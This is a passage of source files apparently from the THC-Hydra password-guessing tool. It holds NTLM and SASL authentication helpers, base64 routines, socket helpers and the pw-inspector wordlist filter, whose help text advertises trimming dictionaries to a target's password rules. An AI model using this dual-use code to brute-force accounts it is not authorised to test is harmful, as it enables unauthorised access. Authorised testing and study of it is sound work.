True);\n\n return True;\n}\n\n#endif\n\n/* libtnlm copyrigth was left here, anyway the interface was slightly modified\n */\n\n/* included libntlm-3.2.9 (c) even if this code is based in 2.1 version*/\n\n/*\nLibntlm AUTHORS -- information about the authors\nCopyright (C) 2002, 2003, 2004 Simon Josefsson\nSee the end for copying conditions.\n\nGrant Edwards \nOriginal author of libntlm\n\nAndrew Tridgell\nWrote functions borrowed from SMB.\n\nSimon Josefsson \nBuild environment, maintainer.\n\nFrediano Ziglio\nContributed LGPL versions of some of the GPL'd Samba files.\n*/\n\n/* The [IS]VAL macros are to take care of byte order for non-Intel\n * Machines -- I think this file is OK, but it hasn't been tested.\n * The other files (the ones stolen from Samba) should be OK.\n * I am not crazy about these macros -- they seem to have gotten\n * a bit complex. A new scheme for handling string/buffer fields\n * in the structures probably needs to be designed\n */\n\n#define AddBytes(ptr, header, buf, count) \\\n { \\\n if (buf != NULL && count != 0) { \\\n SSVAL(&ptr->header.len, 0, count); \\\n SSVAL(&ptr->header.maxlen, 0, count); \\\n SIVAL(&ptr->header.offset, 0, ((ptr->buffer - ((uint8 *)ptr)) + ptr->bufIndex)); \\\n memcpy(ptr->buffer + ptr->bufIndex, buf, count); \\\n ptr->bufIndex += count; \\\n } else { \\\n ptr->header.len = ptr->header.maxlen = 0; \\\n SIVAL(&ptr->header.offset, 0, ptr->bufIndex); \\\n } \\\n }\n\n#define AddString(ptr, header, string) \\\n { \\\n char *p = string; \\\n int32_t len = 0; \\\n if (p) \\\n len = strlen(p); \\\n AddBytes(ptr, header, ((unsigned char *)p), len); \\\n }\n\n#define AddUnicodeString(ptr, header, string) \\\n { \\\n char *p = string; \\\n unsigned char *b = NULL; \\\n int32_t len = 0; \\\n if (p) { \\\n len = strlen(p); \\\n b = strToUnicode(p); \\\n } \\\n AddBytes(ptr, header, b, len * 2); \\\n }\n\n#define GetUnicodeString(structPtr, header) unicodeToString(((char *)structPtr) + IVAL(&structPtr->header.offset, 0), SVAL(&structPtr->header.len, 0) / 2)\n#define GetString(structPtr, header) toString((((char *)structPtr) + IVAL(&structPtr->header.offset, 0)), SVAL(&structPtr->header.len, 0))\n#define DumpBuffer(fp, structPtr, header) dumpRaw(fp, ((unsigned char *)structPtr) + IVAL(&structPtr->header.offset, 0), SVAL(&structPtr->header.len, 0))\n\nstatic void dumpRaw(FILE *fp, unsigned char *buf, size_t len) {\n int32_t i;\n\n for (i = 0; i < (int32_t)len; ++i)\n fprintf(fp, \"%02x \", buf[i]);\n\n fprintf(fp, \"\\n\");\n}\n\nstatic char *unicodeToString(char *p, size_t len) {\n int32_t i;\n static char buf[4096];\n\n assert(len + 1 < sizeof buf);\n\n for (i = 0; i < (int32_t)len; ++i) {\n buf[i] = *p & 0x7f;\n p += 2;\n }\n\n buf[i] = '\\0';\n return buf;\n}\n\nstatic unsigned char *strToUnicode(char *p) {\n static unsigned char buf[4096];\n size_t l = strlen(p);\n int32_t i = 0;\n\n assert(l * 2 < sizeof buf);\n\n while (l--) {\n buf[i++] = *p++;\n buf[i++] = 0;\n }\n\n return buf;\n}\n\nstatic unsigned char *toString(char *p, size_t len) {\n static unsigned char buf[4096];\n\n assert(len + 1 < sizeof buf);\n\n memcpy(buf, p, len);\n buf[len] = 0;\n return buf;\n}\n\nvoid buildAuthRequest(tSmbNtlmAuthRequest *request, long flags, char *host, char *domain) {\n char *h = NULL; // strdup(host);\n char *p = NULL; // strchr(h,'@');\n\n // TODO: review default flags\n\n if (host == NULL)\n host = \"\";\n if (domain == NULL)\n domain = \"\";\n\n h = strdup(host);\n p = strchr(h, '@');\n if (p) {\n if (!domain)\n domain = p + 1;\n *p = '\\0';\n }\n if (flags == 0)\n flags = 0x0000b207; /* Lowest security options to avoid negotiation */\n request->bufIndex = 0;\n memcpy(request->ident, \"NTLMSSP\\0\\0\\0\", 8);\n SIVAL(&request->msgType, 0, 1);\n SIVAL(&request->flags, 0, flags);\n\n assert(strlen(host) < 128);\n AddString(request, host, h);\n assert(strlen(domain) < 128);\n AddString(request, domain, domain);\n free(h);\n}\n\nvoid buildAuthResponse(tSmbNtlmAuthChallenge *challenge, tSmbNtlmAuthResponse *response, long flags, char *user, char *password, char *domainname, char *host) {\n uint8 lmRespData[24];\n uint8 ntRespData[24];\n char *u = strdup(user);\n char *p = strchr(u, '@');\n char *w = NULL;\n char *d = strdup(GetUnicodeString(challenge, uDomain));\n char *domain = d;\n\n if (domainname != NULL)\n domain = domainname;\n\n if (host == NULL)\n host = \"\";\n w = strdup(host);\n\n if (p) {\n domain = p + 1;\n *p = '\\0';\n }\n\n SMBencrypt((unsigned char *)password, challenge->challengeData, lmRespData);\n SMBNTencrypt((unsigned char *)password, challenge->challengeData, ntRespData);\n\n response->bufIndex = 0;\n memcpy(response->ident, \"NTLMSSP\\0\\0\\0\", 8);\n SIVAL(&response->msgType, 0, 3);\n\n AddBytes(response, lmResponse, lmRespData, 24);\n AddBytes(response, ntResponse, ntRespData, 24);\n\n assert(strlen(domain) < 128);\n AddUnicodeString(response, uDomain, domain);\n assert(strlen(u) < 128);\n AddUnicodeString(response, uUser, u);\n assert(strlen(w) < 128);\n AddUnicodeString(response, uWks, w);\n\n AddString(response, sessionKey, NULL);\n\n if (flags != 0)\n challenge->flags = flags; /* Overide flags! */\n response->flags = challenge->flags;\n\n if (w)\n free(w);\n if (d)\n free(d);\n if (u)\n free(u);\n}\n\n// info functions\nvoid dumpAuthRequest(FILE *fp, tSmbNtlmAuthRequest *request);\nvoid dumpAuthChallenge(FILE *fp, tSmbNtlmAuthChallenge *challenge);\nvoid dumpAuthResponse(FILE *fp, tSmbNtlmAuthResponse *response);\n\nvoid dumpAuthRequest(FILE *fp, tSmbNtlmAuthRequest *request) {\n fprintf(fp, \"NTLM Request:\\n\");\n fprintf(fp, \" Ident = %s\\n\", request->ident);\n fprintf(fp, \" mType = %u\\n\", IVAL(&request->msgType, 0));\n fprintf(fp, \" Flags = %08x\\n\", IVAL(&request->flags, 0));\n fprintf(fp, \" Host = %s\\n\", GetString(request, host));\n fprintf(fp, \" Domain = %s\\n\", GetString(request, domain));\n}\n\nvoid dumpAuthChallenge(FILE *fp, tSmbNtlmAuthChallenge *challenge) {\n fprintf(fp, \"NTLM Challenge:\\n\");\n fprintf(fp, \" Ident = %s\\n\", challenge->ident);\n fprintf(fp, \" mType = %u\\n\", IVAL(&challenge->msgType, 0));\n fprintf(fp, \" Domain = %s\\n\", GetUnicodeString(challenge, uDomain));\n fprintf(fp, \" Flags = %08x\\n\", IVAL(&challenge->flags, 0));\n fprintf(fp, \" Challenge = \");\n dumpRaw(fp, challenge->challengeData, 8);\n fprintf(fp, \" Incomplete!! parse optional parameters\\n\");\n}\n\nvoid dumpAuthResponse(FILE *fp, tSmbNtlmAuthResponse *response) {\n fprintf(fp, \"NTLM Response:\\n\");\n fprintf(fp, \" Ident = %s\\n\", response->ident);\n fprintf(fp, \" mType = %u\\n\", IVAL(&response->msgType, 0));\n fprintf(fp, \" LmResp = \");\n DumpBuffer(fp, response, lmResponse);\n fprintf(fp, \" NTResp = \");\n DumpBuffer(fp, response, ntResponse);\n fprintf(fp, \" Domain = %s\\n\", GetUnicodeString(response, uDomain));\n fprintf(fp, \" User = %s\\n\", GetUnicodeString(response, uUser));\n fprintf(fp, \" Wks = %s\\n\", GetUnicodeString(response, uWks));\n fprintf(fp, \" sKey = \");\n DumpBuffer(fp, response, sessionKey);\n fprintf(fp, \" Flags = %08x\\n\", IVAL(&response->flags, 0));\n}\n\n/*\n * base64.c -- base-64 conversion routines.\n *\n * For license terms, see the file COPYING in this directory.\n *\n * This base 64 encoding is defined in RFC2045 section 6.8,\n * \"Base64 Content-Transfer-Encoding\", but lines must not be broken in the\n * scheme used here.\n */\n\n/*\n * This code borrowed from fetchmail sources\n */\n\nstatic const char base64digits[] = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";\n\n#define BAD -1\nstatic const char base64val[] = {BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, 62, BAD, BAD, BAD, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, BAD, BAD, BAD, BAD, BAD, BAD,\n BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, BAD, BAD, BAD, BAD, BAD, BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, BAD, BAD, BAD, BAD, BAD};\n\n#define DECODE64(c) (isascii(c) ? base64val[c] : BAD)\n\nvoid to64frombits(unsigned char *out, const unsigned char *in, int32_t inlen)\n\n/* raw bytes in quasi-big-endian order to base 64 string (NUL-terminated) */\n{\n for (; inlen >= 3; inlen -= 3) {\n *out++ = base64digits[in[0] >> 2];\n *out++ = base64digits[((in[0] << 4) & 0x30) | (in[1] >> 4)];\n *out++ = base64digits[((in[1] << 2) & 0x3c) | (in[2] >> 6)];\n *out++ = base64digits[in[2] & 0x3f];\n in += 3;\n }\n if (inlen > 0) {\n unsigned char fragment;\n\n *out++ = base64digits[in[0] >> 2];\n fragment = (in[0] << 4) & 0x30;\n if (inlen > 1)\n fragment |= in[1] >> 4;\n *out++ = base64digits[fragment];\n *out++ = (inlen < 2) ? '=' : base64digits[(in[1] << 2) & 0x3c];\n *out++ = '=';\n }\n *out = '\\0';\n}\n\nint32_t from64tobits(char *out, const char *in)\n\n/* base 64 to raw bytes in quasi-big-endian order, returning count of bytes */\n{\n int32_t len = 0;\n register unsigned char digit1, digit2, digit3, digit4;\n\n if (in[0] == '+' && in[1] == ' ')\n in += 2;\n if (*in == '\\r')\n return (0);\n\n do {\n digit1 = in[0];\n if (DECODE64(digit1) == BAD)\n return (-1);\n digit2 = in[1];\n if (DECODE64(digit2) == BAD)\n return (-1);\n digit3 = in[2];\n if (digit3 != '=' && DECODE64(digit3) == BAD)\n return (-1);\n digit4 = in[3];\n if (digit4 != '=' && DECODE64(digit4) == BAD)\n return (-1);\n in += 4;\n *out++ = (DECODE64(digit1) << 2) | (DECODE64(digit2) >> 4);\n ++len;\n if (digit3 != '=') {\n *out++ = ((DECODE64(digit2) << 4) & 0xf0) | (DECODE64(digit3) >> 2);\n ++len;\n if (digit4 != '=') {\n *out++ = ((DECODE64(digit3) << 6) & 0xc0) | DECODE64(digit4);\n ++len;\n }\n }\n } while (*in && *in != '\\r' && digit4 != '=');\n\n return (len);\n}\n\n/* base64.c ends here */\n" }, { "path": "ntlm.h", "content": "/* $Id$\n Single file NTLM system to create and parse authentication messages.\n\n http://www.reversing.org\n ilo-- ilo@reversing.org\n\n I did copy&paste&modify several files to leave independent NTLM code\n that compile in cygwin/linux environment. Most of the code was ripped\n from Samba implementation so I left the Copying statement. Samba core\n code was left unmodified from 1.9 version.\n\n Also libntlm was ripped but rewrote, due to fixed and useless interface.\n Copyright and licensing information is in ntlm.c file.\n\n NTLM Interface, just two functions:\n\n void BuildAuthRequest(tSmbNtlmAuthRequest *request, long flags, char *host,\n char *domain); if flags is 0 minimun security level is selected, otherwise\n new value superseeds. host and domain are optional, they may be NULLed.\n\n void buildAuthResponse(tSmbNtlmAuthChallenge *challenge, tSmbNtlmAuthResponse\n *response, long flags, char *user, char *password, char *domain, char *host);\n Given a challenge, generates a response for that user/passwd/host/domain.\n flags, host, and domain superseeds given by server. Leave 0 and NULL for\n server authentication\n\n\n This is an usage sample:\n\n\n ...\n //beware of fixed sized buffer, asserts may fail, don't use long\n strings :)\n //Yes, I Know, year 2k6 and still with this shit..\n unsigned char buf[4096];\n unsigned char buf2[4096];\n\n //send auth request: let the server send it's own hostname and\n domainname buildAuthRequest((tSmbNtlmAuthRequest*)buf2,0,NULL,NULL);\n to64frombits(buf, buf2, SmbLength((tSmbNtlmAuthRequest*)buf2));\n send_to_server(buf);\n\n //receive challenge\n receive_from_server(buf);\n\n //build response with hostname and domainname from server\n buildAuthResponse((tSmbNtlmAuthChallenge*)buf,(tSmbNtlmAuthResponse*)buf2,0,\"username\",\"password\",NULL,NULL);\n to64frombits(buf, buf2, SmbLength((tSmbNtlmAuthResponse*)buf2));\n send_to_server(buf);\n\n //get reply and Check if ok\n ...\n\n\n included bonus!!:\n Base64 code\n int32_t from64tobits(char *out, const char *in);\n void to64frombits(unsigned char *out, const unsigned char *in, int32_t\n inlen);\n\n\n\n\n You don't need to read the rest of the file.\n*/\n\n/*\n * These structures are byte-order dependant, and should not\n * be manipulated except by the use of the routines provided\n */\n#ifdef __sun\n#include \n#elif defined(__FreeBSD__) || defined(__IBMCPP__) || defined(_AIX)\n#include \n#else\n#include \n#endif\n\ntypedef unsigned short uint16;\ntypedef uint32_t uint32;\ntypedef unsigned char uint8;\n\ntypedef struct {\n uint16 len;\n uint16 maxlen;\n uint32 offset;\n} tSmbStrHeader;\n\ntypedef struct {\n char ident[8];\n uint32 msgType;\n uint32 flags;\n tSmbStrHeader host;\n tSmbStrHeader domain;\n uint8 buffer[1024];\n uint32 bufIndex;\n} tSmbNtlmAuthRequest;\n\ntypedef struct {\n char ident[8];\n uint32 msgType;\n tSmbStrHeader uDomain;\n uint32 flags;\n uint8 challengeData[8];\n uint8 reserved[8];\n tSmbStrHeader emptyString;\n uint8 buffer[1024];\n uint32 bufIndex;\n} tSmbNtlmAuthChallenge;\n\ntypedef struct {\n char ident[8];\n uint32 msgType;\n tSmbStrHeader lmResponse;\n tSmbStrHeader ntResponse;\n tSmbStrHeader uDomain;\n tSmbStrHeader uUser;\n tSmbStrHeader uWks;\n tSmbStrHeader sessionKey;\n uint32 flags;\n uint8 buffer[1024];\n uint32 bufIndex;\n} tSmbNtlmAuthResponse;\n\nextern void buildAuthRequest(tSmbNtlmAuthRequest *request, long flags, char *host, char *domain);\n\n/* reversing interface */\n\n/* ntlm functions */\nvoid BuildAuthRequest(tSmbNtlmAuthRequest *request, long flags, char *host, char *domain);\n\n// if flags is 0 minimun security level is selected, otherwise new value\n// superseeds. host and domain are optional, they may be NULLed.\n\nvoid buildAuthResponse(tSmbNtlmAuthChallenge *challenge, tSmbNtlmAuthResponse *response, long flags, char *user, char *password, char *domain, char *host);\n\n// Given a challenge, generates a response for that user/passwd/host/domain.\n// flags, host, and domain superseeds given by server. Leave 0 and NULL for\n// server authentication\n\n/* Base64 code*/\nint32_t from64tobits(char *out, const char *in);\nvoid to64frombits(unsigned char *out, const unsigned char *in, int32_t inlen);\n\nvoid xor (char *out, char *in1, char *in2, int32_t n);\n\n// info functions\nvoid dumpAuthRequest(FILE *fp, tSmbNtlmAuthRequest *request);\nvoid dumpAuthChallenge(FILE *fp, tSmbNtlmAuthChallenge *challenge);\nvoid dumpAuthResponse(FILE *fp, tSmbNtlmAuthResponse *response);\n\nvoid strupper(char *s);\n\n#define SmbLength(ptr) (((ptr)->buffer - (uint8 *)(ptr)) + (ptr)->bufIndex)\n" }, { "path": "performance.h", "content": "#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n/* handles select errors */\nint32_t my_select(int32_t fd, fd_set *fdread, fd_set *fdwrite, fd_set *fdex, long sec, long usec) {\n int32_t ret_val;\n struct timeval stv;\n fd_set *fdr2, *fdw2, *fde2;\n\n do {\n fdr2 = fdread;\n fdw2 = fdwrite;\n fde2 = fdex;\n stv.tv_sec = sec;\n stv.tv_usec = usec;\n if (debug > 1)\n printf(\"before select\\n\");\n ret_val = select(fd, fdr2, fdw2, fde2, &stv);\n if (debug > 1)\n printf(\"after select\\n\");\n /* XXX select() sometimes returns errno=EINTR (signal found) */\n } while (ret_val == -1 && errno == EINTR);\n\n return ret_val;\n}\n\n/*reads in a non-blocking way*/\nssize_t read_safe(int32_t fd, void *buffer, size_t len) {\n int32_t r = 0;\n int32_t total = 0;\n uint32_t toread = len;\n fd_set fr;\n struct timeval tv;\n int32_t ret = 0;\n\n (void)fcntl(fd, F_SETFL, O_NONBLOCK);\n do {\n FD_ZERO(&fr);\n FD_SET(fd, &fr);\n tv.tv_sec = 0;\n tv.tv_usec = 250000;\n ret = select(fd + 1, &fr, 0, 0, &tv);\n /* XXX select() sometimes return errno=EINTR (signal found) */\n } while (ret == -1 && errno == EINTR);\n\n if (ret < 0) {\n if (debug) {\n perror(\"select\");\n printf(\"df:%d\\n\", fd);\n }\n return -1;\n }\n\n if (ret > 0) {\n while ((r = read(fd, (char *)((char *)buffer + total), toread))) {\n if (r == -1) {\n if (errno == EAGAIN)\n break;\n return -1;\n }\n total += r;\n toread -= r;\n if (total == len)\n return len;\n if (r == 0)\n return 0;\n }\n }\n\n return total;\n}\n" }, { "path": "postgres_ext.h", "content": "\n/*-------------------------------------------------------------------------\n *\n * postgres_ext.h\n *\n *\t This file contains declarations of things that are visible everywhere\n *\tin PostgreSQL *and* are visible to clients of frontend interface\n *libraries. For example, the Oid type is part of the API of libpq and other\n *libraries.\n *\n *\t Declarations which are specific to a particular interface should\n *\tgo in the header file for that interface (such as libpq-fe.h).\tThis\n *\tfile is only for fundamental Postgres declarations.\n *\n *\t User-written C functions don't count as \"external to Postgres.\"\n *\tThose function much as local modifications to the backend itself, and\n *\tuse header files that are otherwise internal to Postgres to interface\n *\twith the backend.\n *\n * $Id: postgres_ext.h,v 1.13 2003/08/27 00:33:34 petere Exp $\n *\n *-------------------------------------------------------------------------\n */\n\n#ifndef POSTGRES_EXT_H\n#define POSTGRES_EXT_H\n\n/*\n * Object ID is a fundamental type in Postgres.\n */\ntypedef uint32_t Oid;\n\n#ifdef __cplusplus\n#define InvalidOid (Oid(0))\n#else\n#define InvalidOid ((Oid)0)\n#endif\n\n#define OID_MAX UINT_MAX\n\n/* you will need to include to use the above #define */\n\n/*\n * NAMEDATALEN is the max length for system identifiers (e.g. table names,\n * attribute names, function names, etc). It must be a multiple of\n * sizeof(int32_t) (typically 4).\n *\n * NOTE that databases with different NAMEDATALEN's cannot interoperate!\n */\n#define NAMEDATALEN 64\n\n/*\n * Identifiers of error message fields. Kept here to keep common\n * between frontend and backend, and also to export them to libpq\n * applications.\n */\n#define PG_DIAG_SEVERITY 'S'\n#define PG_DIAG_SQLSTATE 'C'\n#define PG_DIAG_MESSAGE_PRIMARY 'M'\n#define PG_DIAG_MESSAGE_DETAIL 'D'\n#define PG_DIAG_MESSAGE_HINT 'H'\n#define PG_DIAG_STATEMENT_POSITION 'P'\n#define PG_DIAG_CONTEXT 'W'\n#define PG_DIAG_SOURCE_FILE 'F'\n#define PG_DIAG_SOURCE_LINE 'L'\n#define PG_DIAG_SOURCE_FUNCTION 'R'\n\n#endif\n" }, { "path": "pw-inspector-logo.rc", "content": "1 ICON \"pw-inspector.ico\"\r\n" }, { "path": "pw-inspector.1", "content": ".TH \"PW-INSPECTOR\" \"1\" \"24/05/2012\"\n.SH NAME\npw-inspector \\- A tool to reduce the password list\n.SH SYNOPSIS\n.B pw-inspector\n[\\-i FILE] [\\-o FILE] [\\-m MINLEN] [\\-M MAXLEN] [\\-c MINSETS] \\-l \\-u \\-n \\-p \\-s\n.br\n.SH DESCRIPTION\nPW-Inspector reads passwords in and prints those which meet the requirements.\nThe return code is the number of valid passwords found, 0 if none was found.\nUse for security: check passwords, if 0 is returned, reject password choice.\nUse for hacking: trim your dictionary file to the pw requirements of the target.\nUsage only allowed for legal purposes.\n.SH OPTIONS\n.TP\n.B \\-i FILE\nfile to read passwords from (default: stdin)\n.TP\n.B \\-o FILE\nfile to write valid passwords to (default: stdout)\n.TP\n.B \\-m MINLEN\nminimum length of a valid password\n.TP\n.B \\-M MAXLEN\nmaximum length of a valid password\n.TP\n.B \\-c MINSETS \nthe minimum number of sets required (default: all given)\n.TP\n.B \\-h, \\-\\-help\nShow summary of options.\n.SH SETS\n.TP\n.B \\-l\nlowcase characters (a,b,c,d, etc.)\n.TP\n.B \\-u \nupcase characters (A,B,C,D, etc.)\n.TP\n.B \\-n\nnumbers (1,2,3,4, etc.)\n.TP\n.B \\-p \nprintable characters (which are not \\-l/\\-n/\\-n, e.g. $,!,/,(,*, etc.)\n.TP\n.B \\ -s\nspecial characters \\- all others not withint the sets above\n.SH SEE ALSO\n.BR hydra (1),\n.BR xhydra (1).\n.br\n.SH AUTHOR\nhydra was written by van Hauser / THC and co-maintained by David Maciejak .\n.PP\nThis manual page was written by Daniel Echeverry ,\nfor the Debian project (and may be used by others).\n" }, { "path": "pw-inspector.c", "content": "#include \n#include \n#include \n#include \n#include \n#include \n\n#define PROGRAM \"PW-Inspector\"\n#define VERSION \"v0.2\"\n#define EMAIL \"vh@thc.org\"\n#define WEB \"https://github.com/vanhauser-thc/thc-hydra\"\n\n#define MAXLENGTH 256\n\nchar *prg;\n\nvoid help() {\n printf(\"%s %s (c) 2005 by van Hauser / THC %s [%s]\\n\\n\", PROGRAM, VERSION, EMAIL, WEB);\n printf(\"Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] \"\n \"-l -u -n -p -s\\n\\n\",\n prg);\n printf(\"Options:\\n\");\n printf(\" -i FILE file to read passwords from (default: stdin)\\n\");\n printf(\" -o FILE file to write valid passwords to (default: stdout)\\n\");\n printf(\" -m MINLEN minimum length of a valid password\\n\");\n printf(\" -M MAXLEN maximum length of a valid password\\n\");\n printf(\" -c MINSETS the minimum number of sets required (default: all \"\n \"given)\\n\");\n printf(\"Sets:\\n\");\n printf(\" -l lowcase characters (a,b,c,d, etc.)\\n\");\n printf(\" -u upcase characters (A,B,C,D, etc.)\\n\");\n printf(\" -n numbers (1,2,3,4, etc.)\\n\");\n printf(\" -p printable characters (which are not -l/-u/-n, e.g. \"\n \"$,!,/,(,*, etc.)\\n\");\n printf(\" -s special characters - all others not within the sets \"\n \"above\\n\");\n printf(\"\\n%s reads passwords in and prints those which meet the requirements.\\n\", PROGRAM);\n printf(\"The return code is the number of valid passwords found, 0 if none \"\n \"was found.\\n\");\n printf(\"Use for security: check passwords, if 0 is returned, reject password \"\n \"choice.\\n\");\n printf(\"Use for hacking: trim your dictionary file to the pw requirements of \"\n \"the target.\\n\");\n printf(\"Usage only allowed for legal purposes.\\n\");\n exit(-1);\n}\n\nint main(int argc, char *argv[]) {\n int32_t i, j, k;\n int32_t sets = 0, countsets = 0, minlen = 0, maxlen = MAXLENGTH, count = 0;\n int32_t set_low = 0, set_up = 0, set_no = 0, set_print = 0, set_other = 0;\n FILE *in = stdin, *out = stdout;\n unsigned char buf[MAXLENGTH + 1];\n\n prg = argv[0];\n if (argc < 2)\n help();\n\n while ((i = getopt(argc, argv, \"i:o:m:M:c:lunps\")) >= 0) {\n switch (i) {\n case 'i':\n if ((in = fopen(optarg, \"r\")) == NULL) {\n fprintf(stderr, \"Error: unable to open input file %s\\n\", optarg);\n exit(-1);\n }\n break;\n case 'o':\n if ((out = fopen(optarg, \"w\")) == NULL) {\n fprintf(stderr, \"Error: unable to open output file %s\\n\", optarg);\n exit(-1);\n }\n break;\n case 'm':\n minlen = atoi(optarg);\n break;\n case 'M':\n maxlen = atoi(optarg);\n break;\n case 'c':\n countsets = atoi(optarg);\n break;\n case 'l':\n if (set_low == 0) {\n set_low = 1;\n sets++;\n }\n break;\n case 'u':\n if (set_up == 0) {\n set_up = 1;\n sets++;\n }\n break;\n case 'n':\n if (set_no == 0) {\n set_no = 1;\n sets++;\n }\n break;\n case 'p':\n if (set_print == 0) {\n set_print = 1;\n sets++;\n }\n break;\n case 's':\n if (set_other == 0) {\n set_other = 1;\n sets++;\n }\n break;\n default:\n help();\n }\n }\n if (minlen > maxlen) {\n fprintf(stderr, \"Error: -m MINLEN is greater than -M MAXLEN\\n\");\n exit(-1);\n }\n if (countsets > sets) {\n fprintf(stderr, \"Error: -c MINSETS is larger than the sets defined\\n\");\n exit(-1);\n }\n if (countsets == 0)\n countsets = sets;\n\n while (fgets((void *)buf, sizeof(buf), in) != NULL) {\n int is_low = 0, is_up = 0, is_no = 0, is_print = 0, is_other = 0;\n if (!buf[0])\n continue;\n if (buf[strlen(buf) - 1] == '\\n')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '\\r')\n buf[strlen(buf) - 1] = 0;\n if (strlen(buf) >= minlen && strlen(buf) <= maxlen) {\n i = 0;\n j = 1;\n for (i = 0; i < strlen(buf) && j; i++) {\n j = 0;\n if (set_low && islower(buf[i])) {\n j = 1;\n is_low = 1;\n } else if (set_up && isupper(buf[i])) {\n j = 1;\n is_up = 1;\n } else if (set_no && isdigit(buf[i])) {\n j = 1;\n is_no = 1;\n } else if (set_print && isprint(buf[i]) && !isalnum(buf[i])) {\n j = 1;\n is_print = 1;\n } else if (set_other && !isprint(buf[i])) {\n j = 1;\n is_other = 1;\n }\n }\n if (j && countsets <= is_low + is_up + is_no + is_print + is_other) {\n fprintf(out, \"%s\\n\", buf);\n count++;\n }\n }\n }\n fclose(in);\n fclose(out);\n\n return count;\n}\n" }, { "path": "sasl.c", "content": "#include \"sasl.h\"\n\nextern int32_t selected_proxy;\n\n/*\nprint_hex is used for debug\nit displays the string buf hexa values of size len\n*/\nint32_t print_hex(unsigned char *buf, int32_t len) {\n int32_t i;\n int32_t n;\n\n for (i = 0, n = 0; i < len; i++) {\n if (n > 7) {\n printf(\"\\n\");\n n = 0;\n }\n printf(\"0x%02x, \", buf[i]);\n n++;\n }\n printf(\"\\n\");\n return (0);\n}\n\n/*\nRFC 4013: SASLprep: Stringprep Profile for User Names and Passwords\ncode based on gsasl_saslprep from GSASL project\n*/\nint32_t sasl_saslprep(const char *in, sasl_saslprep_flags flags, char **out) {\n#if LIBIDN\n int32_t rc;\n\n rc = stringprep_profile(in, out, \"SASLprep\", (flags & SASL_ALLOW_UNASSIGNED) ? STRINGPREP_NO_UNASSIGNED : 0);\n if (rc != STRINGPREP_OK) {\n *out = NULL;\n return -1;\n }\n#if defined HAVE_PR29_H\n if (pr29_8z(*out) != PR29_SUCCESS) {\n free(*out);\n *out = NULL;\n return -1;\n }\n#endif\n#else\n size_t i, inlen = strlen(in);\n\n for (i = 0; i < inlen; i++) {\n if (in[i] & 0x80) {\n *out = NULL;\n hydra_report(stderr, \"Error: Can't convert UTF-8, you should install libidn\\n\");\n return -1;\n }\n }\n *out = malloc(inlen + 1);\n if (!*out) {\n hydra_report(stderr, \"Error: Can't allocate memory\\n\");\n return -1;\n }\n strcpy(*out, in);\n#endif\n return 0;\n}\n\n/*\nRFC 4616: The PLAIN Simple Authentication and Security Layer (SASL) Mechanism\nsasl_plain computes the plain authentication from strings login and password\nand stored the value in variable result\nthe first parameter result must be able to hold at least 255 bytes!\n*/\nchar *sasl_plain(char *result, char *login, char *pass) {\n char *preplogin;\n char *preppasswd;\n int32_t rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n\n if (rc) {\n result = NULL;\n return result;\n }\n rc = sasl_saslprep(pass, 0, &preppasswd);\n if (rc) {\n free(preplogin);\n result = NULL;\n return result;\n }\n if (2 * strlen(preplogin) + 3 + strlen(preppasswd) < 180) {\n strcpy(result, preplogin);\n strcpy(result + strlen(preplogin) + 1, preplogin);\n strcpy(result + 2 * strlen(preplogin) + 2, preppasswd);\n hydra_tobase64((unsigned char *)result, strlen(preplogin) * 2 + strlen(preppasswd) + 2, 250);\n }\n free(preplogin);\n free(preppasswd);\n return result;\n}\n\n#ifdef LIBOPENSSL\n\n/*\nRFC 2195: IMAP/POP AUTHorize Extension for Simple Challenge/Response\nsasl_cram_md5 computes the cram-md5 authentication from password string\nand the challenge sent by the server, and stored the value in variable\nresult\nthe parameter result must be able to hold at least 100 bytes!\n*/\nchar *sasl_cram_md5(char *result, char *pass, char *challenge) {\n char ipad[64];\n char opad[64];\n unsigned char md5_raw[MD5_DIGEST_LENGTH];\n MD5_CTX md5c;\n int32_t i, rc;\n char *preppasswd;\n\n if (challenge == NULL) {\n result = NULL;\n return result;\n }\n rc = sasl_saslprep(pass, 0, &preppasswd);\n if (rc) {\n result = NULL;\n return result;\n }\n memset(ipad, 0, sizeof(ipad));\n memset(opad, 0, sizeof(opad));\n if (strlen(preppasswd) >= 64) {\n MD5_Init(&md5c);\n MD5_Update(&md5c, preppasswd, strlen(preppasswd));\n MD5_Final(md5_raw, &md5c);\n memcpy(ipad, md5_raw, MD5_DIGEST_LENGTH);\n memcpy(opad, md5_raw, MD5_DIGEST_LENGTH);\n } else {\n strcpy(ipad, preppasswd); // safe\n strcpy(opad, preppasswd); // safe\n }\n for (i = 0; i < 64; i++) {\n ipad[i] ^= 0x36;\n opad[i] ^= 0x5c;\n }\n MD5_Init(&md5c);\n MD5_Update(&md5c, ipad, 64);\n MD5_Update(&md5c, challenge, strlen(challenge));\n MD5_Final(md5_raw, &md5c);\n MD5_Init(&md5c);\n MD5_Update(&md5c, opad, 64);\n MD5_Update(&md5c, md5_raw, MD5_DIGEST_LENGTH);\n MD5_Final(md5_raw, &md5c);\n for (i = 0; i < MD5_DIGEST_LENGTH; i++) {\n sprintf(result, \"%02x\", md5_raw[i]);\n result += 2;\n }\n free(preppasswd);\n return result;\n}\n\n/*\nsasl_cram_sha1 computes the cram-sha1 authentication from password string\nand the challenge sent by the server, and stored the value in variable\nresult\nthe parameter result must be able to hold at least 100 bytes!\n*/\nchar *sasl_cram_sha1(char *result, char *pass, char *challenge) {\n char ipad[64];\n char opad[64];\n unsigned char sha1_raw[SHA_DIGEST_LENGTH];\n SHA_CTX shac;\n int32_t i, rc;\n char 